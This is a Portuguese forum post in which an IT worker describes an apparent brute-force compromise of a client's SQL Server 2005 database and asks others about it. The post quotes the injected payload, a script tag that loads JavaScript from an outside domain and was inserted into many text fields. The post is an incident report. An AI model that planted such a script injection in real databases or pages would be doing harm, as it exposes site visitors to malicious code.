Usamos cookies para medir audiência e melhorar sua experiência. Você pode aceitar ou recusar a qualquer momento. Veja sobre o iMasters.
Boa tarde, galera!
Não tão boa assim para a empresa que presto serviço.
Aparentemente o servidor de banco de dados foi atacado com sucesso aqui (SQL Server 2005).
Não sei precisar qual foi o método usado, porém, fala-se muito em força bruta... já que no LOG tem várias chamadas (de vários dias) de tentativas de acesso usando os usuários admin, root e sa...
Em vários campos do tipo varchar foram adicionado o conteúdo "<script src=http://www.killwow1.cn/g.js></script>"; muitos tiveram o conteúdo real trucando essa adição. Só sei que a galera de IT está se ferrando pra restabelecer o sistema.
Imaginei que só era, sei lá, restaurar um backup recente... até porque foi final de semana... porém... se acessaram o servidor... com uma dessas senhas... provavelmente tiveram acesso a tudo... inclusive aos backups... já soube de várias invasões... mas a maioria só mostravam que estiveram ali para testar suas técnicas... não para corromper dados... sei lá.
Alguém já ouviu falar algo sobre isso atualmente?
ps.: no script que foi incluído existe, está um comando para criar um iframe de uma página no referido domínio.
Carregando comentários...
